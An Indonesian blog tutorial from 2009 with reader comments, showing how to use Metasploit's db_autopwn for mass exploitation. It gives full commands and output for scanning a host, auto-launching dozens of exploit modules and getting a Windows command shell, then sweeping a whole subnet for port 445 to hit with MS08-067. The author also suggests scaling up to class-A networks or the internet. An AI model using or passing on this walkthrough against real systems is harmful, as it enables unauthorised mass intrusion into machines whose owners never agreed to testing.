5
Apr

Metasploit II : Mass Exploitation

   Posted by: Mas Rony   in Security, Tips

Add Comment

Artikel ini merupakan lanjutan dari artikel sebelumnya yaitu Metasploit I : Teknik Dasar. Dalam artikel yang kedua ini saya ingin membahas mengenai penggunaan metasploit untuk mass exploitation dengan menggunakan db_autopwn.
Sebelumnya pastikan instalasi metasploit kita sudah terintegrasi terlebih dahulu dengan database (bisa menggunakan MySQL, postgre, ataupun SQLite3) dan nmap. Prosedur instalasinya silahkan anda lihat disini.
Metode mass exploitation pertama yang akan saya gunakan dalam artikel ini menggunakan teknik mass exploit pada satu mesin dengan memanfaatkan vulnerability di seluruh layanan server/port yang terbuka, atau kita istilahkan pendekatan secara vertikal (istilah ini ndak akan ketemu kalo mbuka-mbuka kamus eksploitasi sistem, lha wong istilahnya made in indo hahaha.. ). Model pendekatan yang lain juga akan dicoba (secara singkat) di bawah artikel ini.

Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.

- Jalankan metasploit console dari shell :

    $ sudo msfconsole

                                      _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|
       =[ msf v3.3-dev
+ -- --=[ 359 exploits - 233 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 132 aux

- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)

    msf > load db_mysql

    [*] Successfully loaded plugin: db_mysql

- Sambungkan metasploit dengan database di MySQL

    msf > db_connect msf:msf@localhost/metasploit
    msf >

- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.

    msf > db_nmap -v -sS 192.168.1.10

    [*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
NMAP: Initiating ARP Ping Scan at 17:35
NMAP: Scanning 192.168.1.10 [1 port]
NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
NMAP: Initiating SYN Stealth Scan at 17:35
NMAP: Scanning 192.168.1.10 [1715 ports]
NMAP: Discovered open port 1723/tcp on 192.168.1.10
NMAP: Discovered open port 3389/tcp on 192.168.1.10
NMAP: Discovered open port 139/tcp on 192.168.1.10
NMAP: Discovered open port 1025/tcp on 192.168.1.10
NMAP: Discovered open port 1026/tcp on 192.168.1.10
NMAP: Discovered open port 445/tcp on 192.168.1.10
NMAP: Discovered open port 1043/tcp on 192.168.1.10
NMAP: Discovered open port 12345/tcp on 192.168.1.10
NMAP: Discovered open port 1521/tcp on 192.168.1.10
NMAP: Discovered open port 135/tcp on 192.168.1.10
NMAP: Discovered open port 3372/tcp on 192.168.1.10
NMAP: Discovered open port 1433/tcp on 192.168.1.10
NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
NMAP: Host 192.168.1.10 appears to be up ... good.
NMAP: Interesting ports on 192.168.1.10:
NMAP: Not shown: 1703 closed ports
NMAP: PORT      STATE SERVICE
NMAP: 135/tcp   open  msrpc
NMAP: 139/tcp   open  netbios-ssn
NMAP: 445/tcp   open  microsoft-ds
NMAP: 1025/tcp  open  NFS-or-IIS
NMAP: 1026/tcp  open  LSA-or-nterm
NMAP: 1043/tcp  open  boinc
NMAP: 1433/tcp  open  ms-sql-s
NMAP: 1521/tcp  open  oracle
NMAP: 1723/tcp  open  pptp
NMAP: 3372/tcp  open  msdtc
NMAP: 3389/tcp  open  ms-term-serv
NMAP: 12345/tcp open  netbus
NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
NMAP:
NMAP: Read data files from: /usr/share/nmap
NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
msf >

- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan

    msf > db_autopwn -h

    [*] Usage: db_autopwn [options]
	-h          Display this help text
	-t          Show all matching exploit modules
	-x          Select modules based on vulnerability references
	-p          Select modules based on open ports
	-e          Launch exploits against all matched targets
	-r          Use a reverse connect shell
	-b          Use a bind shell on a random port
	-q          Disbale exploit module output
	-I  [range] Only exploit hosts inside this range
	-X  [range] Always exclude hosts inside this range
	-PI [range] Only exploit hosts with these ports open
	-PX [range] Always exclude hosts with these ports open
	-m  [regex] Only run modules whose name matches the regex
msf >

- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database

    msf > db_autopwn -p -t

    [*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Lakukan exploitasi system dengan menambahkan opsi -e :

    msf > db_autopwn -p -t -e

    [*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Connecting to the server...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Authenticating as user 'Administrator'...
[*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[-] Exploit failed: wrong number of arguments (1 for 0)
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Server appears to have been patched
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.

    msf > sessions -l

    Active sessions
===============
  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.1.6:46451 -> 192.168.1.10:29595

- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :

    msf > sessions -i 1

    [*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
    C:\WINDOWS\system32>ipconfig

    ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.10
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Owned… !!

Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :

    msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24

    [*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
Interesting ports on 192.168.1.6:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.10:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
Interesting ports on 192.168.1.12:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
Interesting ports on 192.168.1.20:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
Interesting ports on 192.168.1.26:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:04:23:6E:EC:AD (Intel)
Interesting ports on 192.168.1.28:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Interesting ports on 192.168.1.30:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
Interesting ports on 192.168.1.103:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:18:DE:07:3D:91 (Intel)
Interesting ports on 192.168.1.254:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
msf >

Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.

Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri.. :D
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn. Artikelnya nyusul yah, karena laptop ini belum ada nessusnya. Abis fresh install :D

Seperti biasa, use this article wisely. Saya ndak akan nulis artikel ini utk tujuan pendidikan semata, penulis tidak bertanggung jawab bla..bla..bla.. Tapi saya lebih suka menggugah kesadaran anda saja.

Sumber, kredit, dan tautan terkait :
- http://www.kecoak-elektronik.net
- http://blog.metasploit.com

Tags: , , , , , ,

This entry was posted on Sunday, April 5th, 2009 at 6:12 PM and is filed under Security, Tips. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

8 comments so far

Hardiee nda heboh lagiNo Gravatar
 1 

Mas, komentar sy ini sbnrnya berhubungan dgn status mas di pesbuk. (Blog sdh dukung mobile). Langsung deh meluncur kesini. Mantaps!. Cuman teks yg berisi code2, nggak motong (baca:wordwrap), jd scrollbar horizontal muncul di browserku, jd navigasinya jd susah, ya mungkin jg tergantung browser ato hp?.Tapi tetap keren!!. :)

April 18th, 2009 at 1:51 AM
Mas RonyNo Gravatar
 2 

Masalah itu karena script html di code2 tersebut krn make preformatted (script html dibuat supaya tampilan yang ada sesuai dengan output eksekusi code), sehingga kalo ada output yang panjang, keluarnya tetep panjang /tidak wordwrap. Kalo pemilahan tampilan yang muncul di hp sebenarnya dilakukan dengan filter dari browser dg memanfaatkan user agent-nya. Jadi masalahnya bukan di browser atau hp.
Nanti saya cari cara lain lagi di next article supaya tampilannya bisa sempurna. Kalo ada saran atau masukan kontak yah.. so bisa langsung dicoba and kalo cespleng kan why not ? :)
Thanks bgt hardie atas koreksinya

April 18th, 2009 at 11:25 AM
rifa'iNo Gravatar
 3 

Kak… makasih tutorialnya. Saya udah mempelajari mulai instalasi sampai dengan lanjutannya di metasploit II, dan sebelumnya terima kasih sudah memberikan pencerahan ke saya mengenai metasploit sehingga bisa ikut mencicipi tools ini. Tapi saya menunggu yang metasploit III kok tidak ditulis-tulis ya kk ? Ayo dong kaka’.. terusin yang pakai nessus. Saya sudah (sedikit) baca-baca mengenai cross referencing mode ini, tapi masih belum tahu “arahnya”. Mohon pencerahannya
Notes : via japri ke email juga boleh kok kaka’ :)

May 26th, 2009 at 4:36 AM
devyptrcNo Gravatar
 4 

msf > load db_mysql
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new ‘db_driver’
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /opt/metasploit/plugins/db_mysql: Deprecated plugin

ko sulit yah

August 29th, 2009 at 2:40 AM
RonyNo Gravatar
 5 

Diperhatiin dulu error messagenya sebelum bertanya :)
Use the new ‘db_driver’ command to use a database driver.
Pastiin up to date ya…

August 31st, 2009 at 3:26 PM
mikhaelNo Gravatar
 6 

mas, lanjutan tutorialx yach.

November 23rd, 2009 at 11:17 AM
mikhaelNo Gravatar
 7 

mas, tolong ilmux di tuntaskan yah. hehehee… soalx sy agk sulit cr bahan blajar tool ini.

thx b4

November 23rd, 2009 at 11:21 AM
RonyNo Gravatar
 8 

maaf ya mikhael saya belum sempat nulis yang menggunakan nessus :)
alasan sibuk kok keknya gaya bgt yah… hahaha..

December 10th, 2009 at 5:25 PM

One Trackback/Ping

  1. Metasploit I : Teknik Dasar » Mas Rony's Notes    Apr 16 2009 / 3pm:

    [...] dengan db_auotpwn, tapi ternyata capek juga nulis segini panjang. Yah terpaksa bikin berseri : Metasploit II : Mass exploitation. Nyusul yah…. Use this article and this information [...]

Leave a reply

Name (*)
Mail (will not be published) (*)
URI
Comment
Back to top